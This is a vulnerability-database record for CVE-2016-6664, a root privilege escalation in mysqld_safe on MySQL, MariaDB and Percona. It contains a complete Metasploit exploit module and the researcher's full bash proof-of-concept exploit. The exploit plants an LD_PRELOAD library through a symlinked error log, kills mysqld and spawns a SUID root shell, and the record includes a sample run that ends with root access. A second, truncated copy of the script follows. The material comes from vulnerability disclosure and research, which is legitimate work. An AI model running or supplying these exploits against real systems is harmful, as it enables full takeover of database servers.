ID CVE-2016-6664 Type cve Reporter cve@mitre.org Modified 2020-11-09T03:20:00
Description
mysqld_safe in Oracle MySQL through 5.5.51, 5.6.x through 5.6.32, and 5.7.x through 5.7.14; MariaDB; Percona Server before 5.5.51-38.2, 5.6.x before 5.6.32-78-1, and 5.7.x before 5.7.14-8; and Percona XtraDB Cluster before 5.5.41-37.0, 5.6.x before 5.6.32-25.17, and 5.7.x before 5.7.14-26.17, when using file-based logging, allows local users with access to the mysql account to gain root privileges via a symlink attack on error logs and possibly other files.
{"metasploit": [{"lastseen": "2017-01-23T01:01:31", "description": "[About](<https://www.rapid7.com/about> \"About Rapid7\" ) [For Customers](<https://www.rapid7.com/for-customers> \"For Rapid7 Customers\" ) [Free Tools](<https://www.rapid7.com/free-tools> \"Free Tools from Rapid7\" )\n\n[  ](<https://www.rapid7.com> \"Rapid7\" )\n\n * [Home](<https://www.rapid7.com/> \"Rapid7.com\" )\n * Vulnerability & Exploit Database \n\n# Vulnerability & Exploit Database", "published": "2016-11-25T19:03:23", "type": "metasploit", "title": "CVE-2016-6664 MySQL / MariaDB / Percona - Root Privilege Escalation ", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6664"], "modified": "1970-01-01T00:00:00", "href": "https://www.rapid7.com/db/modules/exploit/linux/local/mysql_priv_esc", "id": "MSF:EXPLOIT/LINUX/LOCAL/MYSQL_PRIV_ESC", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire \"msf/core\"\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Post::Common\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MySQL / MariaDB / Percona - Root Privilege Escalation',\n 'Description' => %q{\n MySQL-based databases including MySQL, MariaDB and Percona are affected\n by a privilege escalation vulnerability which can let attackers who have\n gained access to mysql system user to further escalate their privileges\n to root user allowing them to fully compromise the system.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'x2020 <x2020@gmail.com>', # Module\n 'Dawid Golunski' # Discovery\n ],\n 'DisclosureDate' => 'Nov 01 2016',\n 'Platform' => [ 'linux'],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [ ['Automatic', {}] ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' =>\n {\n 'DisablePayloadHandler' => true\n },\n 
'References' =>\n [\n [ 'EDB', '40679'],\n [ 'CVE', '2016-6664'],\n [ 'URL', 'https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html']\n ]\n ))\n register_options(\n [\n OptString.new('ErrorLog', [ true, 'The error log file', '/var/log/mysql/error.log' ]),\n OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),\n OptString.new('BackdoorShell', [ true, 'The shell path', '/bin/bash' ]),\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])\n ], self.class)\n end\n\n def check\n\n def check_reqs?()\n # should have mysqld_safe running\n check_command = \"if pgrep mysqld; \"\n check_command << \"then echo OK; \"\n check_command << \"fi\"\n output = cmd_exec(check_command).gsub(\"\\r\", '')\n vprint_status output\n if output['OK'] == 'OK'\n vprint_good \"mysqld_safe is running\"\n return true\n end\n print_error \"mysqld process not running\"\n false\n end\n\n def mysql_user?()\n # test for mysql user\n mysql = cmd_exec(\"id | grep -E '(mysql)'\")\n if not mysql.include?(\"mysql\")\n print_error \"The current session user (#{mysql}) is not mysql\"\n return false\n end\n vprint_good \"The current user is mysql\"\n true\n end\n\n def preload_exists?()\n if exists?(\"/etc/ld.so.preload\")\n print_error \"Found ld.so.preload. Exiting for safety.\"\n return true\n end\n false\n end\n\n def sudo_exists?()\n @sudo = cmd_exec('which sudo')\n if @sudo.include?(\"sudo\")\n return true\n end\n false\n end\n\n if check_reqs? and mysql_user? and sudo_exists?\n if preload_exists?\n return CheckCode::Detected\n end\n return CheckCode::Appears\n end\n\n CheckCode::Safe\n end\n\n def exploit\n\n if check != CheckCode::Appears\n fail_with(Failure::NotVulnerable, 'Target not vulnerable! 
punt!')\n end\n\n # first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version.\n def has_prereqs?()\n vprint_status('Checking if gcc is installed')\n if target.name == \"Ubuntu\"\n gcc = cmd_exec('which gcc')\n if gcc.include?('gcc')\n vprint_good('gcc is installed')\n else\n print_error('gcc is not installed. Compiling will fail.')\n end\n return gcc.include?('gcc')\n else\n return false\n end\n end\n\n compile = has_prereqs?\n if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'\n if has_prereqs?()\n compile = true\n vprint_status('Live compiling exploit on system')\n else\n vprint_status('Dropping pre-compiled exploit on system')\n end\n end\n\n # build file names and locations\n privesclib_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8) + \".so\"\n privescsrc_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8) + \".c\"\n pwn_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\n payload_path = datastore[\"WritableDir\"] + \"/\" + rand_text_alpha(8)\n backdoorsh = datastore[\"BackdoorShell\"]\n backdoorpath = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\n error_log_file = datastore[\"ErrorLog\"]\n\n # setup the files\n rm_f pwn_file\n if compile\n vprint_status \"Writing pwn source to #{privescsrc_file}\"\n rm_f privescsrc_file\n write_file(privescsrc_file, privesclib_file)\n cmd_exec(\"gcc -Wall -fPIC -shared -o #{privesclib_file} #{privescsrc_file} -ldl\")\n register_file_for_cleanup(privescsrc_file)\n else\n # privesclib.so file\n path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-6664', '2016-6664.out')\n fd = ::File.open( path, \"rb\")\n privesclib = fd.read(fd.stat.size)\n fd.close\n vprint_status \"Writing privesclib to #{privesclib_file}\"\n backdoorpath = \"/tmp/mysqlrootsh\" # hardcoded into privesclib.so\n write_file(privesclib_file, privesclib)\n end\n 
register_file_for_cleanup(backdoorpath)\n register_file_for_cleanup(privesclib_file)\n\n # the actual pwning\n def do_pwn(privesclib_file, suidbin, backdoorpath, payload_path)\n print_status \"Executing escalation.\"\n do_cmd_exec(\"echo #{privesclib_file} > /etc/ld.so.preload\")\n do_cmd_exec(\"chmod 755 /etc/ld.so.preload\")\n do_cmd_exec(\"#{suidbin} 2>/dev/null >/dev/null\")\n do_cmd_exec(\"#{backdoorpath} -p -c \\\"rm -f /etc/ld.so.preload; rm -f #{privesclib_file}\\\"\")\n do_cmd_exec(\"#{backdoorpath} -p\")\n end\n\n # reset system state\n def do_cleanup(error_log_file)\n cmd_exec(\"rm -f #{error_log_file}\")\n cmd_exec(\"mv -f #{error_log_file}.tmp #{error_log_file}\")\n cmd_exec(\"if [ -f /etc/ld.so.preload ]; then echo -n > /etc/ld.so.preload; fi\")\n vprint_status \"Cleanup done.\"\n end\n\n # util cmd_exec with verbose print\n def do_cmd_exec(cmd)\n vprint_status cmd\n r = cmd_exec(cmd)\n if r != \"\"\n print_status r\n end\n end\n\n # initial setup for pwning\n vprint_status \"Seting up the preload trap\"\n do_cmd_exec(\"cp #{backdoorsh} #{backdoorpath}\")\n do_cmd_exec(\"touch -f #{error_log_file}; mv #{error_log_file} #{error_log_file}.tmp && ln -s /etc/ld.so.preload #{error_log_file}\")\n do_cmd_exec(\"kill $(pgrep mysqld)\")\n\n # wait for restart\n print_status \"Waiting for mysqld to restart...\"\n cmd_exec(\"while :; do { sleep 0.1; if [ -f /etc/ld.so.preload ]; then { echo #{privesclib_file} > /etc/ld.so.preload; rm -f #{error_log_file}; break; } fi } done\", nil, 125)\n\n # pwn the system\n do_pwn(privesclib_file, @sudo, backdoorpath, payload_path)\n\n # cleanup the mess\n do_cleanup(error_log_file)\n\n end\nend\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/mysql_priv_esc.rb"}], "seebug": [{"lastseen": "2017-11-19T12:02:51", "description": "I. 
VULNERABILITY\r\n-------------------------\r\n\r\nMySQL / MariaDB / PerconaDB - Root Privilege Escalation\r\n\r\nMySQL \r\n\t<= 5.5.51\r\n\t<= 5.6.32\r\n\t<= 5.7.14\r\n\r\nMariaDB\r\n\tAll current\r\n\r\nPercona Server\r\n\t< 5.5.51-38.2\r\n\t< 5.6.32-78-1\r\n\t< 5.7.14-8\r\n\r\nPercona XtraDB Cluster\r\n\t< 5.6.32-25.17\r\n\t< 5.7.14-26.17\r\n\t< 5.5.41-37.0\r\n\r\n\r\nII. BACKGROUND\r\n-------------------------\r\n\r\nMySQL:\r\n\r\n\"MySQL is the world's most popular open source database.\r\nWhether you are a fast growing web property, technology ISV or large\r\nenterprise, MySQL can cost-effectively help you deliver high performance,\r\nscalable database applications.\"\r\n\r\n\"Many of the world's largest and fastest-growing organizations including\r\nFacebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time\r\nand money powering their high-volume Web sites, business-critical systems and\r\npackaged software.\"\r\n\r\nhttp://www.mysql.com/products/\r\nhttp://www.mysql.com/why-mysql/\r\n\r\n--\r\n\r\nMariaDB:\r\n\r\n\"MariaDB is one of the most popular database servers in the world. \r\nIts made by the original developers of MySQL and guaranteed to stay open source. \r\nNotable users include Wikipedia, WordPress.com and Google.\r\n\r\nMariaDB turns data into structured information in a wide array of applications, \r\nranging from banking to websites. It is an enhanced, drop-in replacement for MySQL. \r\nMariaDB is used because it is fast, scalable and robust, with a rich ecosystem of \r\nstorage engines, plugins and many other tools make it very versatile for a wide \r\nvariety of use cases.\"\r\n\r\nhttps://mariadb.org/about/\r\n\r\n--\r\n\r\nPerconaDB:\r\n\r\n\"Percona Server for MySQL is a free, fully compatible, enhanced, open source \r\ndrop-in replacement for MySQL that provides superior performance, scalability \r\nand instrumentation. 
\r\nWith over 3,000,000 downloads, Percona Server's self-tuning algorithms and support\r\nfor extremely high-performance hardware delivers excellent performance and reliability.\"\r\n\r\nhttps://www.percona.com/software/mysql-database/percona-server\r\n\r\n\r\nIII. INTRODUCTION\r\n-------------------------\r\n\r\nMySQL-based databases including MySQL, MariaDB and PerconaDB are affected\r\nby a privilege escalation vulnerability which can let attackers who have\r\ngained access to mysql system user to further escalate their privileges\r\nto root user allowing them to fully compromise the system.\r\nThe vulnerability stems from unsafe file handling of error logs and\r\nother files.\r\n\r\n\r\nIV. DESCRIPTION\r\n-------------------------\r\n\r\nThe error.log file on most default installations of MySQL/PerconaDB/MariaDB\r\ndatabases is stored either in /var/log/mysql or /var/lib/mysql directory.\r\n\r\nThe permissions on the file and directory look as follows:\r\n```\r\nroot@trusty:/var/lib/mysql# ls -la /var/log/mysql\r\ntotal 468\r\ndrwxr-s--- 2 mysql adm 4096 Sep 11 06:25 .\r\ndrwxrwxr-x 36 root syslog 4096 Sep 11 06:25 ..\r\n-rw-r----- 1 mysql adm 0 Sep 11 06:25 error.log\r\n\r\nroot@trusty:/var/lib/mysql# ls -lad /var/log/mysql\r\ndrwxr-s--- 2 mysql adm 4096 Sep 11 06:25 /var/log/mysql\r\n```\r\n\r\nmysqld_safe wrapper that is normally used for starting MySQL daemon and \r\ncreating/reopening the error.log performs certain unsafe file operations that\r\nmay allow attackers to gain root privileges.\r\n\r\nThe wrapper script contains a 'while' loop shown below which monitors the mysqld \r\nprocess and performs a restart in case of the process failure. 
\r\nThe restart involves re-creation of the error.log file if syslog logging has\r\nnot been configured instead of error log files (file-based logging is the \r\ndefault setting on most installations).\r\n\r\n\r\n--------[ mysqld_safe ]--------\r\n```\r\n[...]\r\n\r\nwhile true\r\ndo\r\n rm -f \"$pid_file\" # Some extra safety\r\n\r\n start_time=`date +%M%S`\r\n\r\n eval_log_error \"$cmd\"\r\n\r\n if [ $want_syslog -eq 0 -a ! -f \"$err_log\" ]; then\r\n touch \"$err_log\" # hypothetical: log was renamed but not\r\n chown $user \"$err_log\" # flushed yet. we'd recreate it with\r\n chmod \"$fmode\" \"$err_log\" # wrong owner next time we log, so set\r\n fi # it up correctly while we can!\r\n\r\n[...]\r\n```\r\n-------------------------------\r\n\r\nAs can be seen, the error.log file is created (touch) and chowned to the user\r\nrunning the mysqld daemon (typically 'mysql'). \r\n\r\nThe operation is vulnerable to a symlink attack.\r\n\r\nAttackers who obtained access to mysql account, through CVE-2016-6663\r\nvulnerability described at:\r\n\r\nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html\r\n\r\nwould gain access to /var/log or /var/lib/mysql directories (owned by mysql user) \r\nand could therefore easily remove the error.log file and replace it \r\nwith a symlink to an arbitrary system file and escalate privileges.\r\n\r\nThe privilege escalation could be triggered instantly (without the need to wait\r\nfor mysql service restart/reboot) by attackers having 'mysql' account by simply \r\nkilling the mysqld child process (launched by the mysqld_safe wrapper).\r\n\r\nWhen the mysqld process gets terminated, the wrapper will then re-iterate the \r\nloop shown above and immediately create a mysql-owned file in the location \r\nspecified by the attacker in the symlink thus allowing attackers to quickly\r\nescalate their privileges.\r\n\r\n\r\nV. 
PROOF OF CONCEPT EXPLOIT\r\n-------------------------\r\n\r\n-------[ mysql-chowned.sh ]------\r\n```\r\n#!/bin/bash -p\r\n#\r\n# MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit\r\n# mysql-chowned.sh (ver. 1.0)\r\n#\r\n# CVE-2016-6664 / OCVE-2016-5617\r\n#\r\n# Discovered and coded by:\r\n#\r\n# Dawid Golunski\r\n# dawid[at]legalhackers.com\r\n#\r\n# https://legalhackers.com\r\n#\r\n# Follow https://twitter.com/dawid_golunski for updates on this advisory.\r\n#\r\n# This PoC exploit allows attackers to (instantly) escalate their privileges\r\n# from mysql system account to root through unsafe error log handling.\r\n# The exploit requires that file-based logging has been configured (default).\r\n# To confirm that syslog logging has not been enabled instead use:\r\n# grep -r syslog /etc/mysql\r\n# which should return no results.\r\n#\r\n# This exploit can be chained with the following vulnerability:\r\n# CVE-2016-6663 / OCVE-2016-5616\r\n# which allows attackers to gain access to mysql system account (mysql shell).\r\n#\r\n# In case database server has been configured with syslog you may also use:\r\n# CVE-2016-6662 as an alternative to this exploit.\r\n#\r\n# Usage:\r\n# ./mysql-chowned.sh path_to_error.log \r\n#\r\n#\r\n# See the full advisory for details at:\r\n# https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html\r\n#\r\n# Video PoC:\r\n# https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html\r\n#\r\n# Disclaimer:\r\n# For testing purposes only. 
Do no harm.\r\n#\r\n\r\nBACKDOORSH=\"/bin/bash\"\r\nBACKDOORPATH=\"/tmp/mysqlrootsh\"\r\nPRIVESCLIB=\"/tmp/privesclib.so\"\r\nPRIVESCSRC=\"/tmp/privesclib.c\"\r\nSUIDBIN=\"/usr/bin/sudo\"\r\n\r\nfunction cleanexit {\r\n\t# Cleanup \r\n\techo -e \"\\n[+] Cleaning up...\"\r\n\trm -f $PRIVESCSRC\r\n\trm -f $PRIVESCLIB\r\n\trm -f $ERRORLOG\r\n\ttouch $ERRORLOG\r\n\tif [ -f /etc/ld.so.preload ]; then\r\n\t\techo -n > /etc/ld.so.preload\r\n\tfi\r\n\techo -e \"\\n[+] Job done. Exiting with code $1 \\n\"\r\n\texit $1\r\n}\r\n\r\nfunction ctrl_c() {\r\n echo -e \"\\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation.\"\r\n\tcleanexit 0\r\n}\r\n\r\n#intro \r\necho -e \"\\033[94m \\nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \\nmysql-chowned.sh (ver. 1.0)\\n\\nCVE-2016-6664 / OCVE-2016-5617\\n\"\r\necho -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttp://legalhackers.com \\033[0m\"\r\n\r\n# Args\r\nif [ $# -lt 1 ]; then\r\n\techo -e \"\\n[!] Exploit usage: \\n\\n$0 path_to_error.log \\n\"\r\n\techo -e \"It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\\n\"\r\n\texit 3\r\nfi\r\n\r\n# Priv check\r\n\r\necho -e \"\\n[+] Starting the exploit as \\n\\033[94m`id`\\033[0m\"\r\nid | grep -q mysql \r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] You need to execute the exploit as mysql user! Exiting.\\n\"\r\n\texit 3\r\nfi\r\n\r\n# Set target paths\r\nERRORLOG=\"$1\"\r\nif [ ! -f $ERRORLOG ]; then\r\n\techo -e \"\\n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. 
Try again.\\n\"\r\n\texit 3\r\nfi\r\necho -e \"\\n[+] Target MySQL log file set to $ERRORLOG\"\r\n\r\n# [ Active exploitation ]\r\n\r\ntrap ctrl_c INT\r\n# Compile privesc preload library\r\necho -e \"\\n[+] Compiling the privesc shared library ($PRIVESCSRC)\"\r\ncat <<_solibeof_>$PRIVESCSRC\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <sys/stat.h>\r\n#include <unistd.h>\r\n#include <dlfcn.h>\r\n #include <sys/types.h>\r\n #include <sys/stat.h>\r\n #include <fcntl.h>\r\n\r\nuid_t geteuid(void) {\r\n\tstatic uid_t (*old_geteuid)();\r\n\told_geteuid = dlsym(RTLD_NEXT, \"geteuid\");\r\n\tif ( old_geteuid() == 0 ) {\r\n\t\tchown(\"$BACKDOORPATH\", 0, 0);\r\n\t\tchmod(\"$BACKDOORPATH\", 04777);\r\n\t\t//unlink(\"/etc/ld.so.preload\");\r\n\t}\r\n\treturn old_geteuid();\r\n}\r\n_solibeof_\r\n/bin/bash -c \"gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\"\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] Failed to compile the privesc lib $PRIVESCSRC.\"\r\n\tcleanexit 2;\r\nfi\r\n\r\n\r\n# Prepare backdoor shell\r\ncp $BACKDOORSH $BACKDOORPATH\r\necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\n`ls -l $BACKDOORPATH`\"\r\n\r\n# Safety check\r\nif [ -f /etc/ld.so.preload ]; then\r\n\techo -e \"\\n[!] /etc/ld.so.preload already exists. Exiting for safety.\"\r\n\texit 2\r\nfi\r\n\r\n# Symlink the log file to /etc\r\nrm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG\r\nif [ $? -ne 0 ]; then\r\n\techo -e \"\\n[!] Couldn't remove the $ERRORLOG file or create a symlink.\"\r\n\tcleanexit 3\r\nfi\r\necho -e \"\\n[+] Symlink created at: \\n`ls -l $ERRORLOG`\"\r\n\r\n# Wait for MySQL to re-open the logs\r\necho -ne \"\\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\\n\"\r\nread -p \"Do you want to kill mysqld process to instantly get root? :) ? [y/n] \" THE_ANSWER\r\nif [ \"$THE_ANSWER\" = \"y\" ]; then\r\n\techo -e \"Got it. 
Executing 'killall mysqld' now...\"\r\n\tkillall mysqld\r\nfi\r\nwhile :; do \r\n\tsleep 0.1\r\n\tif [ -f /etc/ld.so.preload ]; then\r\n\t\techo $PRIVESCLIB > /etc/ld.so.preload\r\n\t\trm -f $ERRORLOG\r\n\t\tbreak;\r\n\tfi\r\ndone\r\n\r\n# /etc/\tdir should be owned by mysql user at this point\r\n# Inject the privesc.so shared library to escalate privileges\r\necho $PRIVESCLIB > /etc/ld.so.preload\r\necho -e \"\\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \\n`ls -l /etc/ld.so.preload`\"\r\necho -e \"\\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload\"\r\necho -e \"\\n[+] The /etc/ld.so.preload file now contains: \\n`cat /etc/ld.so.preload`\"\r\nchmod 755 /etc/ld.so.preload\r\n\r\n# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)\r\necho -e \"\\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!\"\r\nsudo 2>/dev/null >/dev/null\r\n\r\n#while :; do \r\n#\tsleep 0.1\r\n#\tps aux | grep mysqld | grep -q 'log-error'\r\n#\tif [ $? -eq 0 ]; then\r\n#\t\tbreak;\r\n#\tfi\r\n#done\r\n\r\n# Check for the rootshell\r\nls -l $BACKDOORPATH\r\nls -l $BACKDOORPATH | grep rws | grep -q root\r\nif [ $? -eq 0 ]; then \r\n\techo -e \"\\n[+] Rootshell got assigned root SUID perms at: \\n`ls -l $BACKDOORPATH`\"\r\n\techo -e \"\\n\\033[94mGot root! The database server has been ch-OWNED !\\033[0m\"\r\nelse\r\n\techo -e \"\\n[!] Failed to get root\"\r\n\tcleanexit 2\r\nfi\r\n\r\n\r\n# Execute the rootshell\r\necho -e \"\\n[+] Spawning the rootshell $BACKDOORPATH now! 
\\n\"\r\n$BACKDOORPATH -p -c \"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB\"\r\n$BACKDOORPATH -p\r\n\r\n# Job done.\r\ncleanexit 0\r\n\r\n```\r\n\r\n------------EOF------------------\r\n\r\n\r\nExample run\r\n~~~~~~~~~~~~~~~~\r\n```\r\nmysql_suid_shell.MYD-4.3$ whoami\r\nmysql\r\n\r\nomysql_suid_shell.MYD-4.3$ dpkg -l | grep percona-server-server\r\niU percona-server-server 5.6.32-78.0-1.xenial amd64 Percona Server database server\r\niF percona-server-server-5.6 5.6.32-78.0-1.xenial amd64 Percona Server database server binaries\r\n\r\nmysql_suid_shell.MYD-4.3$ ./mysql-chowned.sh /var/lib/mysql/xenial-percona.err \r\n \r\nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \r\nmysql-chowned.sh (ver. 1.0)\r\n\r\nCVE-2016-6664 / OCVE-2016-5617\r\n\r\nDiscovered and coded by: \r\n\r\nDawid Golunski \r\nhttp://legalhackers.com \r\n\r\n[+] Starting the exploit as \r\nuid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker)\r\n\r\n[+] Target MySQL log file set to /var/lib/mysql/xenial-percona.err\r\n\r\n[+] Compiling the privesc shared library (/tmp/privesclib.c)\r\n\r\n[+] Backdoor/low-priv shell installed at: \r\n-rwxr-xr-x 1 mysql attacker 1037528 Nov 1 05:08 /tmp/mysqlrootsh\r\n\r\n[+] Symlink created at: \r\nlrwxrwxrwx 1 mysql attacker 18 Nov 1 05:08 /var/lib/mysql/xenial-percona.err -> /etc/ld.so.preload\r\n\r\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\r\nDo you want to kill mysqld process to instantly get root? :) ? [y/n] y\r\nGot it. Executing 'killall mysqld' now...\r\n\r\n[+] MySQL restarted. 
The /etc/ld.so.preload file got created with mysql privileges: \r\n-rw-r----- 1 mysql root 19 Nov 1 05:08 /etc/ld.so.preload\r\n\r\n[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload\r\n\r\n[+] The /etc/ld.so.preload file now contains: \r\n/tmp/privesclib.so\r\n\r\n[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!\r\n-rwsrwxrwx 1 root root 1037528 Nov 1 05:08 /tmp/mysqlrootsh\r\n\r\n[+] Rootshell got assigned root SUID perms at: \r\n-rwsrwxrwx 1 root root 1037528 Nov 1 05:08 /tmp/mysqlrootsh\r\n\r\nGot root! The database server has been ch-OWNED !\r\n\r\n[+] Spawning the rootshell /tmp/mysqlrootsh now! \r\n\r\nmysqlrootsh-4.3# whoami\r\nroot\r\n\r\nmysqlrootsh-4.3# exit\r\nexit\r\n\r\n[+] Cleaning up...\r\n\r\n[+] Job done. Exiting with code 0\r\n\r\n```\r\n\r\nVideo PoC:\r\n~~~~~~~~~~~~~\r\n\r\nhttp://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html\r\n\r\n\r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n\r\nAlthough the severity of this issue is lower on its own (attackers need to\r\ngain access to mysql system user), the vulnerability could easily be combined \r\nwith the CVE-2016-6663 issue.\r\nThe combination of the two would effectively allow low privileged local \r\ndatabase users to escalate their system privileges to root system account and \r\nallow them to fully compromise the server which increases the severity of this\r\nissue.\r\n\r\n \r\nVII. SYSTEMS AFFECTED\r\n-------------------------\r\n\r\nMySQL \r\n\t<= 5.5.51\r\n\t<= 5.6.32\r\n\t<= 5.7.14\r\n\r\nMariaDB\r\n\tAll current\r\n\r\nPercona Server\r\n\t< 5.5.51-38.2\r\n\t< 5.6.32-78-1\r\n\t< 5.7.14-8\r\n\r\nPercona XtraDB Cluster\r\n\t< 5.6.32-25.17\r\n\t< 5.7.14-26.17\r\n\t< 5.5.41-37.0\r\n \r\nVIII. SOLUTION\r\n-------------------------\r\n\r\nVendors have released patches after private disclosure.\r\nUpdate to the latest version of your DBMS.\r\n\r\n \r\nIX. 
REFERENCES\r\n-------------------------\r\n\r\nhttp://legalhackers.com\r\n\r\nThis advisory:\r\nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html\r\n\r\nExploit source code:\r\nhttp://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh\r\n\r\nRelated mysql vulnerabilities discovered by the author of this advisory that can be chained with \r\nthe CVE-2016-6664 vulnerability:\r\n\r\nCVE-2016-6663:\r\nhttp://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html\r\nCVE-2016-6662:\r\nhttp://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html\r\n\r\n\r\nVideo PoC:\r\nhttp://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html\r\n\r\nCVE-2016-6664\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6664\r\n\r\nOracle CPU:\r\nhttp://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL\r\n\r\n\r\n\r\nX. CREDITS\r\n-------------------------\r\n\r\nThe vulnerability has been discovered by Dawid Golunski\r\ndawid (at) legalhackers (dot) com\r\n\r\nhttp://legalhackers.com\r\n \r\nXI. REVISION HISTORY\r\n-------------------------\r\n\r\n01.11.2016 - Advisory released\r\n \r\n\r\nXII. LEGAL NOTICES\r\n-------------------------\r\n\r\nThe information contained within this advisory is supplied \"as-is\" with\r\nno warranties or guarantees of fitness of use or otherwise. 
I accept no\r\nresponsibility for any damage caused by the use or misuse of this information.", "published": "2016-11-02T00:00:00", "type": "seebug", "title": "MySQL / MariaDB / PerconaDB elevation of privilege vulnerability, CVE-2016-6664\uff09", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5616", "CVE-2016-5617", "CVE-2016-6662", "CVE-2016-6663", "CVE-2016-6664"], "modified": "2016-11-02T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92513", "id": "SSV:92513", "sourceData": "\n #!/bin/bash -p\r\n#\r\n# MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit\r\n# mysql-chowned.sh (ver. 1.0)\r\n#\r\n# CVE-2016-6664 / OCVE-2016-5617\r\n#\r\n# Discovered and coded by:\r\n#\r\n# Dawid Golunski\r\n# dawid[at]legalhackers.com\r\n#\r\n# https://legalhackers.com\r\n#\r\n# Follow https://twitter.com/dawid_golunski for updates on this advisory.\r\n#\r\n# This PoC exploit allows attackers to (instantly) escalate their privileges\r\n# from mysql system account to root through unsafe error log handling.\r\n# The exploit requires that file-based logging has been configured (default).\r\n# To confirm that syslog logging has not been enabled instead use:\r\n# grep -r syslog /etc/mysql\r\n# which should return no results.\r\n#\r\n# This exploit can be chained with the following vulnerability:\r\n# CVE-2016-6663 / OCVE-2016-5616\r\n# which allows attackers to gain access to mysql system account (mysql shell).\r\n#\r\n# In case database server has been configured with syslog you may also use:\r\n# CVE-2016-6662 as an alternative to this exploit.\r\n#\r\n# Usage:\r\n# ./mysql-chowned.sh path_to_error.log \r\n#\r\n#\r\n# See the full advisory for details at:\r\n# https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html\r\n#\r\n# Video PoC:\r\n# https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html\r\n#\r\n# Disclaimer:\r\n# For testing purposes only. 
